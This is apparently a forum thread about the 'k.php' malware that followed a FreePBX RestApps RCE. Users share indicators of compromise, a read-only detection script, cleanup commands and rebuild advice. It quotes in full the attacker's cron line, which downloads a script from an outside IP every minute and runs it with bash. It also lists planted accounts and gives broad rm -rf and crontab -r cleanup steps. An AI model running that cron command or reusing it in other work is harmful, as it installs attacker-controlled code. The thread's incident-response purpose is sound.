K.php - a RestApps malicious script

If you were impacted by the restapps security regression a week or two ago, it is possible you were hit with a php script that is currently labeled “k.php”. If you want to see if you were compromised by this script, I’ve included some content below that you can check. I do not claim to have identified everything, but I’m hoping this might help someone.

Anyways, here are the places you can look.

  • crontab -e -u root → if this line exists, you’re compromised. DO NOT run this for testing.

*/1 * * * * wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2

  • crontab -e -u asterisk → if this line exists, you’re compromised. DO NOT run this for testing.

*/1 * * * * wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2

  • cat /etc/shadow → if these users exist, you’re compromised.

bad users → supports, supermaint, sugarmaint

The following files will contain bad content that runs a wget to re-download k.php and re-infect your system. You have to echo the file content and pipe to base64 -d if you want to read it, but here are some of the files that you will find that contain bad content.

/var/lib/asterisk/bin/devnull2
/var/lib/asterisk/bin/devnull
/var/www/html/admin/views/ajax.php
/var/www/html/digium_phones/
/var/www/html/rest_phones/
/var/www/html/admin/modules/core/ajax.php
/var/www/html/digium_phones/ajax.php
/var/www/html/admin/assets/js/config.php
/var/www/html/admin/assets/config.php
/var/www/html/admin/assets/ajax.php
/var/www/html/admin/views/footer.php
/var/www/html/admin/modules/freepbx_ha/license.php
/usr/local/asterisk/ha_trigger
/var/www/db/acl.db
/var/www/html/rest_phones/ajax.php


Note this is NOT a log4j thing but rather the restapps security regression a week or two ago.

See: 2021-12-21 SECURITY: Potential Rest Phone Apps RCE - FreePBX OpenSource Project - Documentation

I’ve edited the post to reflect that information - thank you for clarifying.


I was kind of hoping an official response would come out or maybe an automation to allow folks to test but here were my notes based on early review…

The following should return nothing or an error:

getent passwd supports
getent passwd supermaint
ls /tmp/k
grep useradd /var/www/html/admin/modules/freepbx_ha/license.php
grep 'asterisk -rx' /var/www/html/admin/config.php
grep '37.49.230.74' /var/log/httpd/access*
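An added example, not code from the original thread or from the FreePBX project: a read-only POSIX shell script that folds the indicators from the first post (the crontab line, the planted accounts, the dropped files, and the base64-hidden payload) together with the checks in this post, so one run reports which of them are present. It assumes the indicator list in the thread is the one worth checking, that crontab, /etc/passwd and base64 exist on the host, and that you run it as root with --live; each check takes its input as an argument or on stdin so it can be exercised against constructed data without touching the live system.

```shell
#!/bin/sh
# Added example, not code from the original thread or the FreePBX project:
# read-only checks for the k.php indicators listed in the thread. It only
# reads crontab text, a passwd-style file and the filesystem; it never
# downloads or executes anything. Run with --live as root to scan this host.

# Indicators quoted from the thread (the dot in the address is escaped so
# grep -E matches it literally).
IOC_RE='37\.49\.230\.74|/var/lib/asterisk/bin/devnull2'
IOC_USERS='supports supermaint sugarmaint'
IOC_FILES='/var/lib/asterisk/bin/devnull2
/var/lib/asterisk/bin/devnull
/var/www/html/admin/views/ajax.php
/var/www/html/admin/modules/core/ajax.php
/var/www/html/digium_phones/ajax.php
/var/www/html/admin/assets/js/config.php
/var/www/html/admin/assets/config.php
/var/www/html/admin/assets/ajax.php
/var/www/html/admin/modules/freepbx_ha/license.php
/usr/local/asterisk/ha_trigger
/var/www/html/rest_phones/ajax.php
/tmp/k'

# crontab_hits: read crontab text on stdin and print each line that names
# the C2 address or the dropper path (a clean crontab prints nothing).
crontab_hits() {
    grep -E "$IOC_RE" || true
}

# user_hits FILE: print each planted account that has a "name:" record in
# FILE (use /etc/passwd on a live host).
user_hits() {
    for u in $IOC_USERS; do
        if grep -q "^$u:" "$1" 2>/dev/null; then echo "$u"; fi
    done
}

# file_hits ROOT: print each indicator path that exists under ROOT
# ("/" on a live host; a scratch directory in the test).
file_hits() {
    printf '%s\n' "$IOC_FILES" | while IFS= read -r f; do
        if [ -e "${1%/}$f" ]; then echo "$f"; fi
    done
}

# encoded_hits FILE: the thread notes the dropped files hide their payload
# in base64. Decode every base64-looking run in FILE and print the file
# name if the decoded text references the C2 address or the dropper.
encoded_hits() {
    grep -oE '[A-Za-z0-9+/=]{40,}' "$1" 2>/dev/null | while IFS= read -r blob; do
        if printf '%s' "$blob" | base64 -d 2>/dev/null | grep -qE "$IOC_RE"; then
            echo "$1"
            break
        fi
    done
}

# live_scan: run every check against the running host and report.
# Returns 0 when nothing was found, 1 when at least one indicator hit.
live_scan() {
    found=0
    for u in root asterisk; do
        hits=$(crontab -l -u "$u" 2>/dev/null | crontab_hits)
        if [ -n "$hits" ]; then echo "crontab($u): $hits"; found=1; fi
    done
    hits=$(user_hits /etc/passwd)
    if [ -n "$hits" ]; then echo "planted users: $hits"; found=1; fi
    for f in $(file_hits /); do
        echo "indicator file present: $f"
        found=1
        if [ -n "$(encoded_hits "$f")" ]; then
            echo "  (base64 payload in this file references the C2 address)"
        fi
    done
    if [ "$found" -eq 0 ]; then echo "no k.php indicators found"; fi
    return "$found"
}

if [ "${1:-}" = "--live" ]; then
    live_scan
fi
```

The checks deliberately use `crontab -l` rather than `crontab -e`, and `grep` on /etc/passwd rather than reading /etc/shadow, so the script can be run from a monitoring account that is not allowed to edit anything; a non-zero exit from `live_scan` is the signal to take the box offline and follow the rebuild advice later in the thread.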

Same problem, same ip, same files + freepbx_engine.php.
Attention: the script seems to steal the freepbx backups and the passwords contained in them.
The strange thing is that no calls have been made and the malicious code does not compromise any functionality of freepbx. It seems like some preparatory stuff.


Okay, so I know that I am hit. Now for the real question: how can I get the system clean?

I would not trust any of your backups, as they contain a lot of content that has been compromised and you don’t know if your asterisk files have been tampered with or not. So, you will need to reinstall. I would advise completing all of your security steps upon fresh install - new creds, new certs, etc. ** Correction: You might have a good backup from early December you can load from, but you’ll want to validate **

That said, there are aspects of your system you can pull out en masse without concern. If you use bulk handler for your extensions, use new secrets.

I know it’s technically possible to clean out what has been infected, but given the scope, you will never really have that peace of mind of knowing the system is clean again. Because the hack adds linux users, they can access the system and load who knows what else and cover their tracks.


If you have backups from before the restapps module vulnerability, there’s no reason not to use them and restore to a freshly built system.

A monthly from early December would be good.


They will have access to the passwords / secrets, IP address and extensions.

Good point.

Maybe it’s time to consider installing a rootkit detector before yet another rootkit strikes.

I use

http://rkhunter.sourceforge.net/


Be careful when restoring; even change passwords for external services, for example:
aws ftp backup
tts polly etc


Hi everybody!
I caught this shit with a bonus feature: the command line was inaccessible after login when FreePBX was unable to connect to ip 37.49.230.74.
After analysis I tried to clean the system with the following commands:

cp -rf /home/asterisk/.bashrc ~/.bashrc
cp -rf /home/asterisk/.bash_profile ~/.bash_profile
crontab -u root -l

!!! FIND and CLEAR Exploit CRON !!!

crontab -u root -r
crontab -u asterisk -l

!!! FIND and CLEAR Exploit CRON !!!

crontab -u asterisk -r
userdel -f supports
userdel -f supermaint
userdel -f sugarmaint
rm -rf /etc/subgid
rm -rf /etc/subgid.lock
rm -rf /etc/subgid-
rm -rf /etc/subgid+
rm -rf /etc/subuid
rm -rf /etc/subuid.lock
rm -rf /etc/subuid-

!!! FIND and CLEAR Exploit context !!!

nano /etc/asterisk/extensions_custom.conf
rm -rf /var/www/html/admin/views/ajax.php
rm -rf /var/www/html/digium_phones/
rm -rf /var/www/html/rest_phones/
rm -rf /var/www/html/rest_phones/ajax.php
rm -rf /var/www/html/admin/modules/core/ajax.php
rm -rf /var/www/html/digium_phones/ajax.php
rm -rf /var/www/html/admin/assets/js/config.php
rm -rf /var/www/html/admin/assets/config.php
rm -rf /var/www/html/admin/assets/ajax.php
rm -rf /var/www/html/admin/views/ajax.php
rm -rf /var/www/html/admin/views/.htaccess
rm -rf /var/lib/asterisk/bin/devnull2
rm -rf /var/www/html/admin/modules/freepbx_ha
rm -rf /usr/local/asterisk/ha_trigger
rm -rf /var/spool/asterisk/tmp/k
rm -rf /var/spool/asterisk/tmp/serv
rm -rf /tmp/test.sh
rm -rf /usr/sbin/sysadmin_ha
fwconsole ma downloadinstall framework --force
fwconsole ma downloadinstall restapps --force
fwconsole ma downloadinstall core --force
fwconsole reload

Seems like it’s ok.
If somebody finds anything else, let us know please.


Just found a system tonight with this and spent about 2 hours tracing out the file. Was able to interrupt the program by editing the /var/www/html/admin/modules/freepbx_ha/license.php file and removing the line that re-writes root crontab.

I then discovered this was also in asterisk’s crontab and removed it from there as well.

This seems to have stopped the loop of re-installing.

Getting a lot of:

shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

after this procedure…

Crap, it looks like most of my systems got hit by this… I only have two weeks of backups so can’t do that. Is there any official way to clean this mess off a system?

Which passwords/secrets? Just the phone system ones, or system root passwords etc.?

I don’t know much about iptables, but putting 37.49.230.74 in the blacklist of the firewall doesn’t seem to stop outbound connections to the hacker’s server.
Can anyone post the rules needed to stop the script connecting? I can see the outbound connections keep happening using netstat.

I don’t have such problems.
Try to change repos to another mirror:
fwconsole setting MODULE_REPO https://{mirror or mirror1}.freepbx.org
yum update and reboot.
After logon you need to block access to ip 37.49.230.74 and try to clean.

You need to block 37.49.230.74 with your network hw/sw. The FreePBX blacklist is useless.


If you edit /var/www/html/admin/modules/freepbx_ha/license.php and remove all the commands except the delete-users command, then save it and delete the line from the root crontab and the asterisk crontab, it should stop the cycle…